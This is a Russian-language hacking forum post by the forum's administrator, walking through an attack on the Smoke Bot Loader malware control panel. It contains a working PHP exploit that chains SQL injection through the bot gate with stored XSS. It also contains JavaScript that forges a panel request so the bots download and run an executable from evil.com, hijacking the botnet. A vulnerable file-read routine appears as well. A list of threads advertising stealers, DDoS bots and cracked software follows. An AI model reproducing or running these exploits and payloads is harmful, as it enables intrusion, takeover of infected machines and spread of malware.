Smoke Bot — Уводим ботов за пару затяжек

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Добрый день, дамы и господа, сегодня мы будем ломать Smoke Bot Loader. Продукт весьма популярный и на рынке уже достаточно длительное время, и, как мне кажется, от этого будет только интереснее...
Затяжка первая. SQL-injection и Активная XSS.
В первую очередь, был изучен гейт. Насколько я понял, автор подразумевал, что раз данные, поступающие в админку от бота, будут зашифрованы с помощью rc4, то можно и опустить некоторые проверки. И зря.

После недолгих поисков был найден уязвимый к SQL-инъекции код:
Код:
//Данные из $bot[BOT_PRIVIL] никак не фильтруются
$privs=$bot[BOT_PRIVIL];
// И чуть ниже
mysql_query("UPDATE bots SET ip='".$ip."',time='".$time."',seller='".$sel."',privs='".$privs."' WHERE cname='".$login."'");
В свою очередь, данные из колонки cname при выводе в админке никак не фильтровались, а это означало, что можно было объединить SQL-инъекцию и XSS.

Код эксплоита (2 запроса в гейт и активная XSS уже в панели):
Код:
<?php
function rc4($key, $str) {
    $s = array();
    for ($i = 0; $i < 256; $i++) {
        $s[$i] = $i;
    }
    $j = 0;
    for ($i = 0; $i < 256; $i++) {
        $j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;
        $x = $s[$i];
        $s[$i] = $s[$j];
        $s[$j] = $x;
    }
    $i = 0;
    $j = 0;
    $res = '';
    for ($y = 0; $y < strlen($str); $y++) {
        $i = ($i + 1) % 256;
        $j = ($j + $s[$i]) % 256;
        $x = $s[$i];
        $s[$i] = $s[$j];
        $s[$j] = $x;
        $res .= $str[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]);
    }
    return $res;
}

function send_data($gate_url, $payload){
    $opts = array('http' =>
    array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
        'content' => $payload
        )
    );
    $context  = stream_context_create($opts);
    $result = file_get_contents($gate_url, false, $context);
}

/*===============================
    Config
===============================*/
$gate_url = 'http://smoke.loc/index.php';

/*===============================
    First Request
===============================*/

$key = "1234";
$data[] = "2015"; //bot_magic
$data[] = "1234567890345303020340340320333433323453"; // id
$data[] = "selle"; // aff id
$data[] = "0"; // winver
$data[] = "0"; // winbit
$data[] = "0"; // privs
$data[] = "10001"; // cmd
$data[] = "0"; // opt
$data[] = "0"; // res

$data = implode("#",$data);
$data = RC4($key, $data);
$payload = $key.$data;
send_data($gate_url, $payload);

echo "[+] First request done \n";
unset($data);

/*===============================
    Second Request
===============================*/

$data[] = "2015";
$data[] = "1234567890345303020340340320333433323453";
$data[] = "selle"; 
$data[] = "0";
$data[] = "0";
// SQL-inject через $bot[BOT_PRIVIL], cname должен быть равен 40 символам!
$data[] = "0', cname='<script src=\"//xsssite.com/12\"></script>' where id=1 -- ";
$data[] = "10001";
$data[] = "0";
$data[] = "0";

$data = implode("#",$data);
$data = RC4($key, $data);
$payload = $key.$data;
send_data($gate_url, $payload);

echo "[+] Second request done \n";
Размещаем на подконтрольном ресурсе файл с именем 12 (можно варьировать длину файла, главное чтобы длина строки, идущей в cname была 40 символов) и содержащий внутри банальный код:
Код:
alert('xss');
И результат:
feb9db4827ff2f6da8eba062e0dace37.png

Теперь, попробуем получить хоть-какой то профит.

Затяжка вторая. CSRF и угон ботов.
К сожалению для входа использовалась basic-авторизация, и поэтому просто угнать куки и зайти под админом не получилось бы (XST - редкость, файл с phpinfo и прочие подобные - тоже не всегда получается найти). Поэтому, для того, чтобы получить хоть какой-то профит с найденной нами уязвимости, мы попробуем угнать водокачку пачку ботов. Обновим наш файл.
Код:
var link_to_my_exe = "http://evil.com/my.exe";

var http = new XMLHttpRequest();
var params = "geo=ALL&seller=0&limit=0&start=0&bits=0&comment=no_comment&delafter=1&url="+link_to_my_exe;

http.open("POST", window.location.pathname+"?page=exe", true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.send(encodeURI(params));
Теперь, после посещения админом страницы с ботами, в задания добавится новый таск:
28d2df0482e784642cb5c7e81a34098f.png

Боты грузят наш exe, а после его запуска смоке-бот самоудаляется - гениальная комбинация, блестяще проведенная до конца! И все что нужно знать для атаки - это только адрес до гейта.

Окурки и пепел.
К слову, поле comment в разделе tasks тоже уязвимо для XSS. И хотя я и не смотрел специально код, который относится к модулям (стилер, формграббер, ддос и т.д.), но все равно успел между делом найти парочку XSS (например, в части относящейся к ddos).

Ну а если версия пыха на серваке совсем старая, то можно и конфиг прочитать:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Код который позволяет это сделать:
Код:
//control.php
if ($act == "dwnlog" && !empty($fileid)) {
getlog($fileid.'.txt');
header('Location: '.$referrer);
exit;
}

//funcs.php
function getlog($file)
{
    if(file_exists("./data/".$file))
    {
        header("Cache-Control: no-cache");
        header("Content-Disposition: attachment; filename=".$file);
        header("Content-Type: text/plain");
        header("Content-Transfer-Encoding: binary");
        header("Content-Length: ".filesize("./data/".$file));
        readfile("./data/".$file);
        exit;
    }
    else exit;
}
Но это стоит рассматривать всерьез, только если у вас есть машина времени, и можно вернутся в то золотое время, когда нуллбайт не был редкостью.

Fin.
Как вы могли увидеть (если, конечно, действительно читали текст, написанный выше), даже продукты, которые находятся в продаже аж с 2011 года могут быть уязвимы. А это значит, что нельзя доверять никому. Остается только смириться с тем, что вам суждено жить в мире назойливого маркетинга, фальшивых друзей и пустых обещаний. Вокруг ложь и обман, Бог давно умер, а все мы - лишь бессмысленная материя, миллиарды лет назад сотканная из сверхновых звезд, которая в итоге навсегда исчезнет в многочисленных черных дырах, которые будут расти до тех пор, пока не поглотят все сущее в этой вселенной, а затем медленно растворятся, испуская пучки фотонов. И не останется ничего.
 
  • Like
Реакции: Anorali
L

LUKAGREEN

простите я не понял а по какому запросу ищется Админки ?
 
Название темы
Автор Заголовок Раздел Ответы Дата
NickelBlack Smoke loader 04/2018 [Panel + Builder] Spam/DDOS/Malware 10
eValidator WOW SMS bot - SMS activation service Ищу работу. Предлагаю свои услуги. 0
websprojekt Ожидает оплаты Telegram Bot | Инвайтер | Cпамер | Парсер Телеграм Все что не подошло по разделу 1
eValidator MD5 Hash checker bot Ищу работу. Предлагаю свои услуги. 12
Whit3_D3vil MAGNUS ANDRO BOT 2022 Продажа софта 2
adflak MIDAS BOT - Единый каталог всех теневых ресурсов Ищу работу. Предлагаю свои услуги. 0
P ⭐ MIDAS BOT - Доверенный маркетплейс в TG Все что не подошло по разделу 6
C Крипт за €15 | Fryp Files ~ €15 - Telegram BOT: @cryptmodebot | Auto Crypt Files 24/7 Ищу работу. Предлагаю свои услуги. 0
R How to setup cerberus bot ne t ? Вопросы и интересы 0
NickelBlack Jex Bot V5 | Auto Shell Bot Spam/DDOS/Malware 2
АнАлЬнАя ЧуПаКаБрА Simple Traffic Bot 31.8.1.8 Софт для работы с текстом/Другой софт 1
Fiora Android Bot Продажа софта 3
S Loki Bot 2.0 Android Banker Botnet Spam/DDOS/Malware 3
Uno-uno JEx Bot v3 - Auto grab, Auto scan Софт для работы с текстом/Другой софт 1
B Разработаю️ ▷Создам Телеграм/VK Бота ▷ ️ Creat Telegram/VKontakte Bot Ищу работу. Предлагаю свои услуги. 0
B AZORult стиллер + HVNC Bot, stealer - Мощный стиллер паролей, CC и криптовалют Корзина 2
B Проверено [МАГАЗИН] Telegram Bot Logs Seller Финансы - биллинги, банки, кошельки, логи 0
1 Diabolic traffic bot 6.07 [Crack] Уязвимости и взлом 6
N Telegram bot (ИНТЕРАКТИВНАЯ ТЕМА ДЛЯ ОБЩЕГО ЗАРАБОТКА). Способы заработка 2
S [PHP] Telegram Bot Другие ЯП 3
C AddMeFast BOT — накрутка социальных сетей Софт для работы с текстом/Другой софт 4
C MIRAI BOT Spam/DDOS/Malware 16
C LikeOrgasm Bot 0.05 by FlimE <<< Бот для VK >>> Софт для работы с текстом/Другой софт 2
C VKStorm Bot – бот для VKstorm.ru Софт для работы с текстом/Другой софт 2
M [CS:GO] CSGOUP V7 + BOT Другие ЯП 0
АнАлЬнАя ЧуПаКаБрА GMAIL BOT generator Софт для работы с текстом/Другой софт 2
Admin G-bot 2.2 | Private DDos Bot | Spam/DDOS/Malware 0
Admin Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability Уязвимости и взлом 4
B Twitter Bot [Crack] :3 Софт для работы с текстом/Другой софт 3
BuriTTo New bot for Pokemon GO [18/09/2016] Софт для работы с текстом/Другой софт 1
M Pokemon GO Bot v2.5.0.0 (крякнутый) Софт для работы с текстом/Другой софт 0
D Diabolic Traffic Bot Софт для работы с текстом/Другой софт 1

Название темы